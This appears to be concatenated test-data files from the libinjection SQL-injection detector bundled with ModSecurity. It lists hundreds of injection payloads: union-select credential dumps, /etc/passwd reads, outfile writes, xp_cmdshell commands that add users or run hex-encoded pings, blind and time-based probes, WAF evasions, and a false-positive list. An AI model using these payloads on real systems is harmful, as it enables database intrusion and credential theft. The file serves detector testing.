('ForumMessages','DelficsClassPhotoPoints','ForumForums','DelficsClassPhoto','Banners','Articles','ForumSections','NewsVendors','ATI_Sections','ManagerShopPollOtherSources','NewsDelfics','ATI_MBChipset','ProductsTypes','dtproperties','ForumSubscribers','ManagerShopLogins','LinksFamajor','ManagerShopPollSources','ManagerShopPollDay','ManagerShopPollSums','GbSections','NewsBigmir','NewsCompany','MHShops','NewsGB','NewsHifiSections','NewsShop','NewsHifi','ProductsAction','ProductsArticles','ManagerShopPollCustomer','ProductsComputersAction','ProductsDrivers','ProductsCertificatesAccordance','ProductsParameters','ProductsMain','ProductsParametersAccordanceTypes','ProductsParametersVariantValues','ProductsSections','ProductsParametersValues','ProductsTerms','ProductsValues','RacingCardsView','SearchQueries','ShopCustomers','ServiceCenters','ShopCustomersCities','RacingBingo','Racings','ShopCustomersRegions','ShopDeliveryNightExpress','ShopDeliveryVariants','ShopOrders','ShopOrdersComments','ShopOrdersItems','StormTypes','ProductsCertificates','ShopOrderStatuses','ShopProductsOnMain','ShopSessions','ShopPaymentVariants','sysconstraints','Vendors','StormProducts','VotesQuestions','VotesAnswers','syssegments','ShopDeliveryPlaces','RacingCards','VendorsStatuses','ProductsTypesDiscont','MHSaturday','ProductsLinks'))-- (select top 1 @@version db_name() table_name from information_schema.columns) (select top 1 @@version from information_schema.tables)-- (select @@version) services2_4_3' and substring(version(),1,1)=5/* shares' and substring(version(),1,1)='5 ## showc;id=-1 union select 1,concat_Ws(0x3a,user(),database(),version()),3,4,5-- ## show;type=quest;id=195 union select version() -- Sleater-Kinney' union select 1,2,3,version() -- smori' and 1=0 UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,version(),14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55 -- soc.culture.usa' and(1=1)-- Socerbe'union select 1,2,3,4,5,6,7,concat_ws(0x3a,version(),user(),database()),9,10-- sp09 union select table_name,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18 from information_schema.tables -- ## sp;C=01;l=r;ID=-569387325 and 1=2 union select 1,2,3,4,concat_ws(char(58),@@version,user(),database(),@@version_compile_os),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20 -- spectacle union select 1,type from devis -- speed or(1,1)=(select count(0),concat((select database() from information_schema.tables limit 0,1),floor(rand(0)*2))from(information_schema.tables)group by 2)-- SP-G' and 1=1-- sponsor' uNIon seLEct 1,2,3,4,5 -- ss' union select 1,table_name,3,4,5,6,7,8 from information_schema.tables/* stire-1228 union select 1,2,concat_ws(0x3a,@@version_compile_os,version(),database(),user()),4,5,6,7 limit 1,1 story' limit 0 union select 1,2,3,binary(concat_ws(0x3a,user(),version(),database())),5,6,7,8,9,10,11,12,13,14,15,16,17,18/* student' and 1=2 union select 1,2,3,4,5,version(),7,8,9,10,11,12,13,14,15,16,17,18,19,20,21-- -stuffy' union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,version(),16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85,86,87,88,89,90,91,92,93,94,95,96,97,98,99,100,101,102,103,104,105,106,107,108,109,110,111,112,113,114,115,116,117,118,119,120,121,122,123,124,125,126,127,128,129,130,131,132,133,134,135,136,137,138,139,140,141,142,143,144,145,146,147,148,149,150,151,152,153,154,155,156,157,158,159,160 -- stylia UnIon selECt 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16 -- SVT5' and 1=1-- sv_Vikentiy_Pallotti_–_apostol' and 1=0 union select concat_ws(0x3a,database(),version(),user()) -- TERADVOC' union select 111,name ':' password,3,4 from users theme=1 or 1=@@version title and 1=0 /*!union*/ select 1,2,3,4,concat_ws(0x0b,version(),user(),database(),@@version_compile_os),6,7,8,9,0,1,2,3,4,5,6,7,8-- twitch_hiscores' and 1=2 union select 1,2,3,4,concat_ws(0x3a,user(),version(),database()),6,7,8,9,10,11-- u.-1 UNION SELECT concat_ws(0x3a,user() ,database(),version(),@@version_compile_os),2/* UK5666' and 1=0 or 1=(select top 1 name from sysusers) -- ## unfathomable number-999.9 union select 1,2,3,4- ## */ union ' union select 0,concat(id,char(58),login,char(58),email,char(58),pswd,char(58),is_user),2,3,4 from _user where email='info@artnow.ru'/* ' union select 1/* ' UNION SELECT 1,2,3,4,5/* ' union select 1,2,3,4,5,5,6,7,8,9,0,1,2,3,4,5/* ' union select 1,2,3,4,5,6,7,8,9/* union select 1,2,3,4,5,6,7,8,9,0,1/* ' union select 1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8/* union select 1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0/* ' union select 1,2,3,4,5,6,7,8,9,0,1,2,concat_ws(char(58),version(),user(),database()) -- ' union select 1,2,3,4,5,6,7,8,9,0,1,concat(version(),char(58),database(),char(58),user()),3,4,5/* ' union select 1,2,3,4,5,6,7,8,9,10,11/* ' union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27/* ' union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85,86,87,88,89,90,91,92,93,94,95,96,97,98,99,100/* ' union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,email,password,19,20,21,22,23,24,25,26,27,28,29,30,31 from members limit 1000,1/* ' union select 1,2,3,4,5,6,7,8,9,10,AES_DECRYPT(AES_ENCRYPT(version(),0x73),0x73),12,13,14,15,16,17,18,19,20/* ' UNION SELECT 1,2,3,4,5,6,7,8,9,USER(),DATABASE(),VERSION(),13,14,15,16/* ' union select 1,2,3,4,5,6,7,concat_ws(0x3a,database(),version(),user()),9,10,11,12,13,14,15,16 -- ' union select 1,2,3,4,5,6,table_name,8 from information_schema.tables limit 1,1/* ' UNION SELECT 1,2,3,4,5,load_file('/etc/passwd'),7,8,9-- ' union select 1,2,3,4,concat(user(),char(58),password,char(58),version()),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34 from users/* ' union select 1,2,3,4,concat_ws(0x3a,id,username,password),6,7,8,9,0,1,2,3,4,5 from jos_users limit 0,1/* ' UNION SELECT 1,2,3,4,group_concat(user,0x3B,pword SEPARATOR 0x0b),6,7,8,9 FROM nwqq461s_mastcontent.usrs -- ' UNION SELECT 1,2,3,4,password,6,7,8 FROM astrakhan.portal_users where login='tHunder'/* ' union select 1,2,3,concat(username,char(58),password),5,6 from admin/* ' union select 1,2,3,convert(USER() using cp1251),5,6,7,8,9,0,1,2,3,4,5,6,7,8,9/* ' union select 1,2,3,table_name from information_schema.tables limit 17,1/* 'UNION SELECT 1,2,concat_ws(0x3a,USER(),DATABASE(),VERSION()),4,5,6,7,8,9' ' union select 1,2 from users/* ' union select 1,2,table_name,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4 from information_schema.tables limit 16,1/* ' union select 1,2,user(),4,5/* ' union select 1,2,user,password from mysql.user/* ' /*!UNION*/ SELECT 1,2,version() -- ' union select 1,concat_ws(0x3a,login,password),3 from USERS limit 0,1/* ' union select 1,concat_ws(0x3a,login,pswd,mail,description),3,4,5,6,7 FROM adminusers -- ' union select 1,concat_ws(0x3a ,user(),database(),version()) from users/* ' union select 1,concat_ws(0x3a,version(),user(),database())-- ' union select 1,concat_ws('~',id,username,password),null,4,null,6 from als3_users -- union select 1,concat_ws(user(),version(),database()),3,4,5,6,7,8,9,10,11,12,13,14,15 -- union select 1,TABLE_NAME,3,4 from INFORMATION_SCHEMA.TABLES/* ' union select 1,user(),3,4,5,6,7,8,9,10,database(),version() user/* ' union select 1,version() -- ' union select 1,version(),3,4,5,6,7,8,9-- ' union select 1,version(),3,4,5,6,7,8,9,10,11,12,13,14/* ' union select concat(database(),char(58),user(),char(58),version())/* ' UNION select concat(name,char(58),pass) from admins/* ' union select concat(UserId,char(58),UserPassword) from users into outfile 'content/1.php'/* ' union select concat_ws(0x3a,version(),user(),database()),2,3,4,5,6,7,8,9 -- ' union select id,pass,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24 from users where id=2/* uplotniteli' and 0 union select 1,2,3,4,5,6,7,8,9,GROUP_CON CAT(concat_ws(':',login,password) sepa rator '@') FROM users# usb-flash' and (select 1 from (select count(0),concat((select table_name from information_schema.tables limit 1,1),floor(rand(0)*2)) from information_schema.tables group by 2)a)-- usb-flash' and (select 1 from (select count(0),concat((select version()),floor(rand(0)*2)) from information_schema.tables group by 2)a)-- viewarticlepostartid=19 and 1=2 union select 1,2,uname,4,5,pass,7,8,9,email from rus_users vital' union select version(),2,3,4,5/* =WA=Snurf' and 1='1 =WA=Snurf' and 1=3 union select 1,concat_ws(0x3a,database(),user(),version()) /* -WCC' union select 1,2,concat(char(58,58,58),concat_ws(char(58),member_id,username,password,email),char(58,58,58)) from pmh3457a.exp_members/* -ww194007' union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14 -- yeah'union select 1,AES_DECRYPT(AES_ENCRYPT(USER(),0x71),0x71),3,4/* -yeloSub' union select 1,2,version(),4/* ZharovM' order by 10 -- modsecurity-v3.0.4/others/libinjection/data/sqli-edb-17934.txt0000644000175000017500000000460713607066311024333 0ustar zimmerlezimmerle# http://www.exploit-db.com/papers/17934/ # A few typos corrected 1+or+1+%3D+1 1+%7C%7C+1+%3D+1 1+and+1+%3D+1 1+%26%26+1+%3D+1 1+%7C%7C+%28select+user+from+users+where+user_id+%3D+1%29+%3D+%27admin%27 1+%7C%7C+%28select+user+from+users+where+user_id+%3D+1%29+%3D+%27admin%27 1+%7C%7C+%28select+user+from+users+limit+1%29+%3D+%27admin%27 1+%7C%7C+%28select+user+from+users+group+by+user_id+having+user_id+%3D+1%29+%3D+%27admin%27 1+%7C%7C+%28select+substr%28group_concat%28user_id%29%2C1%2C1%29+user+from+users+%29+%3D+1 1+%7C%7C+%28select+substr%28group_concat%28user_id%29%2C1%2C1%29+user+from+users%29+%3D+1 1+%7C%7C+1+%3D+1+into+outfile+%27result.txt%27 1+%7C%7C+substr%28user%2C1%2C1%29+%3D+%27a%27 1+%7C%7C+%28select+substr%28group_concat%28user_id%29%2C1%2C1%29+user+from+users%29+%3D+1 1+%7C%7C+user_id+is+not+null 1+%7C%7C+substr%28user%2C1%2C1%29+%3D+0x61 1+%7C%7C+substr%28user%2C1%2C1%29+%3D+unhex%2861%29 1+%7C%7C+substr%28user%2C1%2C1%29+%3D+lower%28conv%2811%2C10%2C36%29%29 1+%7C%7C+lpad%28user%2C7%2C1%29 1%0b||%0blpad(user,7,1) 1+union+select+1%2C+table_name+from+information_schema.tables+where+table_name+%3D+%27users%27 1+union+select+1%2C+table_name+from+information_schema.tables+where+table_name+between+%27a%27+and+%27z%27 1+union+select+1%2C+table_name+from+information_schema.tables+where+table_name+between+char%2897%29+and+char%28122%29 1+union+select+1%2C+table_name+from+information_schema.tables+where+table_name+between+0x61+and+0x7a 1+union+select+1%2C+table_name+from+information_schema.tables+where+table_name+like+0x7573657273 1+UnIoN/**/SeLecT/**/1,2,3-- # double url-encoded ## 21%252f%252a*/union%252f%252a*/select%252f%252a*/1,2,3%252f%252a*/from%252f%252a*/users-- 21%2f%2a*/union%2f%2a*/select%2f%2a*/1,2,3%2f%2a*/from%2f%2a*/users-- 1+/**/union/**/select 1+/%2A%2A/union/%2A%2A/select 1+%2f**%2funion%2f**%2fselect 0+div+1+union%23foo*%2F*bar%0D%0Aselect%23foo%0D%0A1%2C2%2Ccurrent_user 0+div+1+union+select+1%2C2%2Ccurrent_user 1+and+(select 1)=(select+0x414141414141441414141414114141414141414141414141414141414141414141.)+union+select+1,2,version(),database(),user(),6,7,8,9,10-- 1/*!UnIoN*/SeLecT+1,2,3-- =/*!UnIoN*/+/*!SeLecT*/+1,2,concat(/*!table_name*/)+FrOm/*!information_schema*/.tables+*!WhErE*/+/*!TaBlE_sChEMa*/+like+database()-- 1%27%3B+%2F%2A%26id%3D1%2A%2F+EXEC+%2F%2A%26id%3D1%2A%2F+master..xp_cmdshell+%2F%2A%26id%3D1%2A%2F+net+user+lucifer+UrWaFisShiT+%2F%2A%26id%3D1%2A%2F+-- modsecurity-v3.0.4/others/libinjection/data/sqli-comparitiveprecomputation.txt0000644000175000017500000000142413607066311030422 0ustar zimmerlezimmerle# http://www.blackhatlibrary.net/Comparative_precomputation ascii(substring(version() from 1 for 1)) length((select length(version()))) ascii(substring(length(version()),1,1)) (select id from (select id,@v:=@v+1 as pos from articles y join (select @v:=0) k limit 255) x where pos=1) (select id from (select id,@v:=@v+1 as pos from articles y join (select @v:=0) k limit 255) x where pos=ascii(substring(version() from 1 for 1))) vulnerable_site' and 1=5 or title=() #' conv(hex(substr(version() FROM 1 FOR 2)),16,10) conv(hex(substr(version() FROM 1 FOR 2)),16,10) >> 0x6 conv(hex(substr(version() FROM 2 FOR 2)),16,10) << 0x2 >> 0x6 uncompress(compress(version())) LENGTH(compress(version())) LENGTH(version()) LENGTH(load_file('/etc/passwd')) LENGTH(compress(load_file('/etc/passwd'))) modsecurity-v3.0.4/others/libinjection/data/sqli-arneswinnen.net-time.txt0000755000175000017500000001163413607066311027165 0ustar zimmerlezimmerle# # http://www.arneswinnen.net/2013/09/automated-sql-injection-detection/ # 1 or (select count(*) from INFORMATION_SCHEMA.tables as sys1,INFORMATION_SCHEMA.tables as sys2,INFORMATION_SCHEMA.tables as sys3,INFORMATION_SCHEMA.tables as sys4,INFORMATION_SCHEMA.tables as sys5,INFORMATION_SCHEMA.tables as sys6)=0 or 1=1 (select count(*) from INFORMATION_SCHEMA.tables as sys1,INFORMATION_SCHEMA.tables as sys2,INFORMATION_SCHEMA.tables as sys3,INFORMATION_SCHEMA.tables as sys4,INFORMATION_SCHEMA.tables as sys5,INFORMATION_SCHEMA.tables as sys6) (select count(*) from INFORMATION_SCHEMA.tables as sys1,INFORMATION_SCHEMA.tables as sys2,INFORMATION_SCHEMA.tables as sys3,INFORMATION_SCHEMA.tables as sys4,INFORMATION_SCHEMA.tables as sys5,INFORMATION_SCHEMA.tables as sys6) as test 9999' or (select count(*) from INFORMATION_SCHEMA.tables as sys1,INFORMATION_SCHEMA.tables as sys2,INFORMATION_SCHEMA.tables as sys3,INFORMATION_SCHEMA.tables as sys4,INFORMATION_SCHEMA.tables as sys5,INFORMATION_SCHEMA.tables as sys6)=0 or '0'='9999 9999" or (select count(*) from INFORMATION_SCHEMA.tables as sys1,INFORMATION_SCHEMA.tables as sys2,INFORMATION_SCHEMA.tables as sys3,INFORMATION_SCHEMA.tables as sys4,INFORMATION_SCHEMA.tables as sys5,INFORMATION_SCHEMA.tables as sys6)=0 or "0"="9999 9999'+(select count(*) from INFORMATION_SCHEMA.tables as sys1,INFORMATION_SCHEMA.tables as sys2,INFORMATION_SCHEMA.tables as sys3,INFORMATION_SCHEMA.tables as sys4,INFORMATION_SCHEMA.tables as sys5,INFORMATION_SCHEMA.tables as sys6)+'9999 9999"+(select count(*) from INFORMATION_SCHEMA.tables as sys1,INFORMATION_SCHEMA.tables as sys2,INFORMATION_SCHEMA.tables as sys3,INFORMATION_SCHEMA.tables as sys4,INFORMATION_SCHEMA.tables as sys5,INFORMATION_SCHEMA.tables as sys6)+"9999 9999'||(select count(*) from INFORMATION_SCHEMA.tables as sys1,INFORMATION_SCHEMA.tables as sys2,INFORMATION_SCHEMA.tables as sys3,INFORMATION_SCHEMA.tables as sys4,INFORMATION_SCHEMA.tables as sys5,INFORMATION_SCHEMA.tables as sys6)||'9999 9999"||(select count(*) from INFORMATION_SCHEMA.tables as sys1,INFORMATION_SCHEMA.tables as sys2,INFORMATION_SCHEMA.tables as sys3,INFORMATION_SCHEMA.tables as sys4,INFORMATION_SCHEMA.tables as sys5,INFORMATION_SCHEMA.tables as sys6)||"9999 (select like('abcdefg',upper(hex(randomblob(150000000))))) as test (select like('abcdefg',upper(hex(randomblob(150000000))))) 9999'||(select like('abcdefg',upper(hex(randomblob(150000000)))))||'9999 9999"||(select like('abcdefg',upper(hex(randomblob(150000000)))))||"9999 (select count(*) from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5) as test (select count(*) from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5) 9999'||(select count(*) from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5)||'9999 9999"||(select count(*) from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5)||"9999 (select benchmark(15000000,md5(0x4e446b6e))-9999) as test benchmark(15000000,md5(0x4e446b6e))-9999 9999' or benchmark(15000000,md5(0x4e446b6e)) or '0'='9999 9999" or benchmark(15000000,md5(0x4e446b6e)) or "0"="9999 (select count(*) from sysusers as sys1,sysusers as sys2,sysusers as sys3,sysusers as sys4,sysusers as sys5,sysusers as sys6,sysusers as sys7) as test (select count(*) from sysusers as sys1,sysusers as sys2,sysusers as sys3,sysusers as sys4,sysusers as sys5,sysusers as sys6,sysusers as sys7) 9999'+(select count(*) from sysusers as sys1,sysusers as sys2,sysusers as sys3,sysusers as sys4,sysusers as sys5,sysusers as sys6,sysusers as sys7)+'9999 9999"+(select count(*) from sysusers as sys1,sysusers as sys2,sysusers as sys3,sysusers as sys4,sysusers as sys5,sysusers as sys6,sysusers as sys7)+"9999 (select count(*) from domain.domains as t1,domain.columns as t2,domain.tables as t3) as test (select count(*) from domain.domains as t1,domain.columns as t2,domain.tables as t3) 9999'||(select count(*) from domain.domains as t1,domain.columns as t2,domain.tables as t3)||'9999 9999"||(select count(*) from domain.domains as t1,domain.columns as t2,domain.tables as t3)||"9999 (select count(*) from rdb$fields as t1,rdb$types as t2,rdb$collations as t3) as test (select count(*) from rdb$fields as t1,rdb$types as t2,rdb$collations as t3) 9999'||(select count(*) from rdb$fields as t1,rdb$types as t2,rdb$collations as t3)||'9999 9999"||(select count(*) from rdb$fields as t1,rdb$types as t2,rdb$collations as t3)||"9999 (select count(*) from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3) as test (select count(*) from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3) 9999'||(select count(*) from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3)||'9999 9999"||(select count(*) from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3)||"9999 (select 99999999 from pg_sleep(15)) as test (select 99999999 from pg_sleep(15)) 9999'||(select 99999999 from pg_sleep(15))||'9999 9999"||(select 99999999 from pg_sleep(15))||"9999 modsecurity-v3.0.4/others/libinjection/data/sqli-arneswinnen.net-boolean.txt0000644000175000017500000000053713607066311027643 0ustar zimmerlezimmerle# # from http://www.arneswinnen.net/2013/09/automated-sql-injection-detection/ # 999999 or 1=1 or 1=1 ' or 1=1 or '1'='1 " or 1=1 or "1"="1 999999) or 1=1 or (1=1 ') or 1=1 or ('1'='1 ") or 1=1 or ("1"="1 999999)) or 1=1 or ((1=1 ')) or 1=1 or (('1'='1 ")) or 1=1 or (("1"="1 999999))) or 1=1 or (((1 '))) or 1=1 or ((('1'='1 "))) or 1=1 or ((("1"="1 modsecurity-v3.0.4/others/libinjection/data/sqli-arithmetic_variations.txt0000644000175000017500000000437013607066311027501 0ustar zimmerlezimmerle # samples # unlikely to execute correctly # probably just generated automatically without regard for usefulness # but seen in wild "FIELD AND NUM=NUM" # FAILS #"1*HOPE AND 8=3", #"0+HOPE AND 8=3", #"0+(HOPE) AND 8=3", HOPE%2A1+AND+8%3D3 ## HOPE%2A%281%29+AND+8%3D3 # RHS variations HOPE+AND+8%3D3 HOPE+AND+-8%3D3 HOPE+AND+-8%3D-3 HOPE+AND+%28-8%29%3D%28-3%29 HOPE+AND+%288%29%3D3 HOPE+AND+8%3D%283%29 HOPE+AND+%288%29%3D%283%29 HOPE+AND+1%2B2%3D3%2B4 HOPE+AND+COS%283%29%3DSIN%284%29 # lhs work arounds HOPE%2A1+AND+8%3D3 ## HOPE%2A%281%29+AND+8%3D3 %28HOPE%29+AND+8%3D3 %28HOPE%29%2A1+AND+8%3D3 %28HOPE%29%2B0+AND+8%3D3 1%2A%28HOPE%29+AND+8%3D3 %281%29%2A%28HOPE%29+AND+8%3D3 %281%29%2AHOPE+AND+8%3D3 %28%281%29%29%2AHOPE+AND+8%3D3 %28%281%29%29%2A%28HOPE%29+AND+8%3D3 %28%281%29%29%2A%28%28HOPE%29%29+AND+8%3D3 %28%28%281%29%29%29%2AHOPE+AND+8%3D3 %28%28%28%281%29%29%29%29%2AHOPE+AND+8%3D3 # based on NUM AND 1=1-- PI%28%29+AND+COS%28PI%28%29%29%3D-1 PI%28%29+%26%26+COS%28PI%28%29%29%3D-1 FLOOR%28PI%28%29%29+AND+SIN%28PI%28%29%29%3D0 -9-%282%29+OR+1+%3D+1 8-9+OR+1+%3D+1 -9-%282%29+OR+1+%3D+1 -9-%28%282%29%29+OR+1+%3D+1 -9-%28%28%282%29%29%29+OR+1+%3D+1 %7E9-%282%29+OR+1+%3D+%7E1 a%27%2712%27+and+%28pi%28%29%3Dpi%28%29%29-- a%27%2712%27+and+pi%28%29%3Dpi%28%29-- dingberry%27%271%27+and+%28false%29-- dingberry%27%271%27+and+%28pi%28%29%3D3%29-- dingberry%27%271%27+and+%283%3Dpi%28%29%29-- 1%27%2712%27+and+%283%3Dpi%28%29%29-- 1%27%2B%2712%27+and+%283%3Dpi%28%29%29-- 1%27%2B%28%2712%27%29+and+%283%3Dpi%28%29%29-- 1%27%2B%28%28%2712%27%29%29+and+%283%3Dpi%28%29%29-- 1%27%2B%28%28%28%2712%27%29%29%29+and+%283%3Dpi%28%29%29-- 1%2B%28%2712%27%29+and+%283%3Dpi%28%29%29-- 1%2Bpi%28%29+and+%283%3Dpi%28%29%29-- 1%2B%28pi%28%29%29+and+%283%3Dpi%28%29%29-- 1%2B%28%28pi%28%29%29%29+and+%283%3Dpi%28%29%29-- 1%2B%28%28%28pi%28%29%29%29%29+and+%283%3Dpi%28%29%29-- 1%27%2Bpi%28%29+and+%283%3Dpi%28%29%29-- 1234%27%27z%27+and+%283%3Dpi%28%29%29-- foo%27+and+1%2B2%2B3%2B4%2B5%2B6%3D21-- foo%27+and+1%2B2%2B3%2B4%2B5%2B6%3D%2821%29-- foo%27+and+%281%2B2%2B3%2B4%2B5%2B6%29%3D21-- foo%27+and+1%2B2%2B3%2B4%2B5%2B6%3D%287%2A3%29-- foo%27+and+%281%2B2%2B3%2B4%2B5%2B6%29%3D%287%2A3%29-- foo%27+and+%281%2B2%2B3%2B4%2B5%2B6%29%3D7%2A3-- foo%27+and+%281%2B2%2B3%2B%284%2B5%2B6%29%29%3D7%2A3-- modsecurity-v3.0.4/others/libinjection/data/sqli-arithmetic_blind_sqli.txt0000644000175000017500000000061413607066311027437 0ustar zimmerlezimmerle# Not sure of original source # attributed to David Litchfield # 234+%2B+%281+%2F+ASCII%28substring%28passwd%2C1%2C1%29%29-4%29 foo%27+%2B+%281+%2F+ASCII%28substring%28passwd%2C1%2C1%29%29-4%29-- 456+%2B+ASCII%28substring%28passwd%2C1%2C1%29%29-10 foo%27%2B+ASCII%28substring%28passwd%2C1%2C1%29%29-10-- # overflow 123%2B+%28%280+%2F+ascii%28substring%28passwd%2C1%2C1%29%29+%2A+4294967296%29 modsecurity-v3.0.4/others/libinjection/data/sqli-@ru_raz0-20160705.txt0000644000175000017500000001163513607066311025477 0ustar zimmerlezimmerle# https://twitter.com/ru_raz0r/status/750311113435283456 # username'exec master..xp_cmdshell'ping 127.0.0.1' -- and password = 'test' username'declare @s varchar (8000); ... username'DECLARE @find varchar(30) = 'Man%' 'begin declare @s varchar (8000);set @s = cast(0x65786563206D61737465722E2E78705F636D647368656C6C202770696E67203137322E31362E392E3627 as varchar(max));exec(@s); end 'goto label; label: declare @s varchar (8000);set @s = cast(0x65786563206D61737465722E2E78705F636D647368656C6C202770696E67203137322E31362E392E3627 as varchar(max));exec(@s)-- 'begin try select 1/0 end try begin catch declare @s varchar (8000);set @s = cast(0x65786563206D61737465722E2E78705F636D647368656C6C202770696E67203137322E31362E392E3627 as varchar(max));exec(@s) end catch-- 'begin try declare @s varchar (8000);set @s = cast(0x65786563206D61737465722E2E78705F636D647368656C6C202770696E67203137322E31362E392E3627 as varchar(max));exec(@s) end try begin catch print 1 end catch-- 'begin goto label declare @a varchar label: declare @s varchar (8000) set @s = cast(0x65786563206D61737465722E2E78705F636D647368656C6C202770696E67203137322E31362E392E3627 as varchar(max));exec(@s) end 'begin goto label ALTER DATABASE pubs SET RECOVERY SIMPLE label: declare @s varchar (8000) set @s = cast(0x65786563206D61737465722E2E78705F636D647368656C6C202770696E67203137322E31362E392E3627 as varchar(max));exec(@s) end-- 'begin goto label select 1 label: @s varchar (8000);set @s = cast(0x65786563206D61737465722E2E78705F636D647368656C6C202770696E67203137322E31362E392E3627 as varchar(max));exec(@s) end-- 'begin goto label label: declare @s varchar (8000);set @s = cast(0x65786563206D61737465722E2E78705F636D647368656C6C202770696E67203137322E31362E392E3627 as varchar(max));exec(@s); end-- 'goto label label: declare @s varchar(8000);set @s = cast(0x65786563206D61737465722E2E78705F636D647368656C6C202770696E67203137322E31362E392E3627 as varchar(max));exec(@s)-- 'goto label ALTER DATABASE pubs SET RECOVERY SIMPLE; label: declare @s varchar(8000);set @s = cast(0x65786563206D61737465722E2E78705F636D647368656C6C202770696E67203137322E31362E392E3627 as varchar(max));exec(@s)-- 'goto label INSERT INTO Production.UnitMeasure (Name, UnitMeasureCode,ModifiedDate) VALUES (N'Square Yards', N'Y2', GETDATE()) label: declare @s varchar(8000);set @s = cast(0x65786563206D61737465722E2E78705F636D647368656C6C202770696E67203137322E31362E392E3627 as varchar(max));exec(@s)-- 'goto label declare @a label: declare @s varchar(8000);set @s = cast(0x65786563206D61737465722E2E78705F636D647368656C6C202770696E67203137322E31362E392E3627 as varchar(max));exec(@s)-- 'goto label select cast(@@version as varchar) label: declare @s varchar(8000);set @s = cast(0x65786563206D61737465722E2E78705F636D647368656C6C202770696E67203137322E31362E392E3627 as varchar(max));exec(@s)-- 'goto label select @@version label: declare @s varchar(8000);set @s = cast(0x65786563206D61737465722E2E78705F636D647368656C6C202770696E67203137322E31362E392E3627 as varchar(max));exec(@s)-- 'goto label select "a" label: declare @s varchar(8000);set @s = cast(0x65786563206D61737465722E2E78705F636D647368656C6C202770696E67203137322E31362E392E3627 as varchar(max));exec(@s)-- 'goto label select 1 label: declare @s varchar(8000);set @s = cast(0x65786563206D61737465722E2E78705F636D647368656C6C202770696E67203137322E31362E392E3627 as varchar(max));exec(@s)-- 'select @@version; declare @s varchar(8000);set @s = cast(0x65786563206D61737465722E2E78705F636D647368656C6C202770696E67203137322E31362E392E3627 as varchar(max));exec(@s) end-- 'select 'a'; declare @s varchar(8000);set @s = cast(0x65786563206D61737465722E2E78705F636D647368656C6C202770696E67203137322E31362E392E3627 as varchar(max));exec(@s) end-- 'select 1; declare @s varchar(8000);set @s = cast(0x65786563206D61737465722E2E78705F636D647368656C6C202770696E67203137322E31362E392E3627 as varchar(max));exec(@s) end-- 'select @@version begin declare @s varchar(8000);set @s = cast(0x65786563206D61737465722E2E78705F636D647368656C6C202770696E67203137322E31362E392E3627 as varchar(max));exec(@s) end-- 'select 'a' begin declare @s varchar(8000);set @s = cast(0x65786563206D61737465722E2E78705F636D647368656C6C202770696E67203137322E31362E392E3627 as varchar(max));exec(@s) end-- 'select 1 begin declare @s varchar(8000);set @s = cast(0x65786563206D61737465722E2E78705F636D647368656C6C202770696E67203137322E31362E392E3627 as varchar(max));exec(@s) end-- 'select @@version goto label select 'a' label:declare @s varchar(8000);set @s = cast(0x65786563206D61737465722E2E78705F636D647368656C6C202770696E67203137322E31362E392E3627 as varchar(max));exec(@s)-- 'select 'a' goto label select 'a' label:declare @s varchar(8000);set @s = cast(0x65786563206D61737465722E2E78705F636D647368656C6C202770696E67203137322E31362E392E3627 as varchar(max));exec(@s)-- 'select 1 goto label select 'a' label:declare @s varchar(8000);set @s = cast(0x6576563206D61737465722E2E78705F636D647368656C6C202770696E67203137322E31362E392E3627 as varchar(max));exec(@s)-- modsecurity-v3.0.4/others/libinjection/data/false_positives.txt0000644000175000017500000003737013607066311025350 0ustar zimmerlezimmerle# # List of various inputs that failed and caused a false positive # 24-7-TEAM A-LAST-MINUTE 1/26/11 TRUE#LAST 1D0AA0A700000004/9GUH7NYWTMDHBAA CTFT0FG7/W4AWAABAAAAGK0WQAGHAAAAGAAABJMCGA= HTTP://WWW.TINYBELLESBLOG.COM/2011/11/2ND-ANNIVERSARY3K-FAN-GIVEAWAY.HTML#{"COLOR":"#2A1100","BACKGROUNDCOLOR":"WHITE","UNVISITEDLINKCOLOR":"#D860A7","FONTFAMILY":"GEORGIA, SERIF"} NOT ALL WHO WANDER ALL NATURAL SKIN CARE DAD TO BE UNIQUE TABLE RUNNER AS FOR ME AND MY HOUSE LOCK AND KEY 1 BY 1 INCH PILLOWS SET WITH ENVELOPES FROM TO TAG CHRISTMAS 3 BY 5 RECIPE CARDS 3 TO 6 MONTHS BY ORDER OF THE MANAGEMENT A IS FOR ADORABLE WHERE IS GEORGE KEY TO MY HEART Y'ALL COME BACK NOW 1950's dresses 